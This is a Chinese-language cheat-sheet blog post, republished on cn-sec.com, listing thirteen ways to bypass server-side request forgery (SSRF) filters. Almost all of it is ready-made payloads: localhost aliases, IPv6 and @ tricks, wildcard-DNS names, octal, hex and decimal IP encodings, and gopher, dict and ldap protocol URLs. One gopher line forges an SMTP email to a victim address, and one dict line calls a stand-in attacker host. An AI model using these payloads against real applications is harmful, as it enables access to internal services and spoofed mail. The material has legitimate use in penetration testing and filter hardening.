SSRF绕过方法总结

admin
admin
admin
139105
文章
114
评论
2021年12月29日04:20:09评论175 views字数 2549阅读8分29秒阅读模式

SSRF绕过方法总结

SSRF绕过方法总结

1、攻击本地

1
2
 
http://127.0.0.1:80
http://localhost:22

2、利用[::]

1
2
3
 
利用[::]绕过localhost
http://[::]:80/  >>>  http://127.0.0.1
也有看到利用http://0000::1:80/的,但是我测试未成功

SSRF绕过方法总结

3、利用@

1
 
http://example.com@127.0.0.1

4、利用短地址

1
 
http://dwz.cn/11SMa  >>>  http://127.0.0.1

5、利用特殊域名

利用的原理是DNS解析

1
 
http://127.0.0.1.xip.io/


SSRF绕过方法总结

1
 
http://www.owasp.org.127.0.0.1.xip.io/


SSRF绕过方法总结

6、利用DNS解析

1
 
在域名上设置A记录,指向127.0.1

SSRF绕过方法总结

7、利用上传

1
2
3
4
 
也不一定是上传,我也说不清,自己体会 -.-
修改"type=file""type=url"
比如:
上传图片处修改上传,将图片文件修改为URL,即可能触发SSRF

8、利用Enclosed alphanumerics

1
2
3
4
 
利用Enclosed alphanumerics
ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ  >>>  example.com
List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿

SSRF绕过方法总结

9、利用句号

1
 
127001  >>>  127.0.0.1

SSRF绕过方法总结

10、利用进制转换

1
2
3
4
5
 
可以是十六进制,八进制等。
115.239.210.26  >>>  16373751032
首先把这四段数字给分别转成16进制,结果:73 ef d2 1a
然后把 73efd21a 这十六进制一起转换成8进制
记得访问的时候加0表示使用八进制(可以是一个0也可以是多个0 跟XSS中多加几个0来绕过过滤一样),十六进制加0x

SSRF绕过方法总结

1
 
http://127.0.0.1  >>>  http://0177.0.0.1/


SSRF绕过方法总结

1
 
http://127.0.0.1  >>>  http://2130706433/


SSRF绕过方法总结

1
2
 
http://192.168.0.1  >>>  http://3232235521/
http://192.168.1.1  >>>  http://3232235777/


SSRF绕过方法总结

11、利用特殊地址

1
 
http://0/

SSRF绕过方法总结

12、利用协议

1
2
3
4
5
6
7
8
9
10
11
 
Dict://
dict://<user-auth>@<host>:<port>/d:<word>
ssrf.php?url=dict://attacker:11111/
SFTP://
ssrf.php?url=sftp://example.com:11111/
TFTP://
ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET
LDAP://
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
Gopher://
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a

13、使用组合

各种绕过的组合即可

作者:瓦都剋,来源:http://byd.dropsec.xyz/

SSRF绕过方法总结快戳阅读原文!获取更多视频教程

本文始发于微信公众号(乌雲安全):SSRF绕过方法总结

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月29日04:20:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SSRF绕过方法总结https://cn-sec.com/archives/488494.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息